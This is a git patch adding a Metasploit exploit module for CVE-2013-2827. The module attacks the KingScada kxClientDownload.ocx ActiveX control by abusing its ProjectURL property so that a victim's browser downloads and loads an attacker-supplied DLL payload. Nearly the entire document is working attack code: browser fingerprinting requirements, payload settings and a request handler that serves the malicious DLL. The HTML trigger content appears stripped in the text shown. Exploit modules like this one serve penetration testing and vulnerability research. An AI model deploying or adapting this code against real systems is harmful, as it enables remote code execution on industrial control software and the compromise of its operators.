From a18de35fa721de78ef9a7fcfb15478181a4d9740 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Thu, 6 Feb 2014 18:25:36 -0600 Subject: [PATCH] Add module for ZDI-14-011 --- .../wellintech_kingscada_kxclientdownload.rb | 93 +++++++++++++++++++ 1 file changed, 93 insertions(+) create mode 100644 modules/exploits/windows/browser/wellintech_kingscada_kxclientdownload.rb diff --git a/modules/exploits/windows/browser/wellintech_kingscada_kxclientdownload.rb b/modules/exploits/windows/browser/wellintech_kingscada_kxclientdownload.rb new file mode 100644 index 0000000000..5ed3a62d0e --- /dev/null +++ b/modules/exploits/windows/browser/wellintech_kingscada_kxclientdownload.rb @@ -0,0 +1,93 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = GoodRanking + + include Msf::Exploit::Remote::BrowserExploitServer + include Msf::Exploit::EXE + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'KingScada kxClientDownload.ocx ActiveX Remote Code Execution', + 'Description' => %q{ + This module abuses the kxClientDownload.ocx distributed with WellingTech KingScada. + The ProjectURL property can be abused to download and load arbitrary DLLs from + arbitrary locations, leading to arbitrary code execution, because of a dangerous + usage of LoadLibrary. Due to the nature of the vulnerability, this module will work + only when there isn't Protected Mode. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Andrea Micalizzi', # aka rgod original discovery + 'juan vazquez' # Metasploit module + ], + 'References' => + [ + ['CVE', '2013-2827'], + ['OSVDB', '102135'], + ['BID', '64941'], + ['ZDI', '14-011'], + ['URL', 'http://ics-cert.us-cert.gov/advisories/ICSA-13-344-01'] + ], + 'DefaultOptions' => + { + 'InitialAutoRunScript' => 'migrate -f', + }, + 'BrowserRequirements' => + { + :source => /script|headers/i, + :os_name => Msf::OperatingSystems::WINDOWS, + :ua_name => /MSIE|KXCLIE/i + }, + 'Payload' => + { + 'Space' => 2048, + 'StackAdjustment' => -3500, + 'DisableNopes' => true + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Automatic', { } ] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Jan 14 2014')) + end + + def on_request_exploit(cli, request, target_info) + print_status("Requested: #{request.uri}") + + if request.uri =~ /\/libs\/.*\.dll/ + print_good("Sending DLL payload") + send_response(cli, + generate_payload_dll(:code => get_payload(cli, target_info)), + 'Content-Type' => 'application/octet-stream' + ) + return + elsif request.uri =~ /\/libs\// + print_status("Sending not found") + send_not_found(cli) + return + end + + content = <<-EOS + + + + + + + + EOS + + print_status("Sending #{self.name}") + send_response_html(cli, content) + end + +end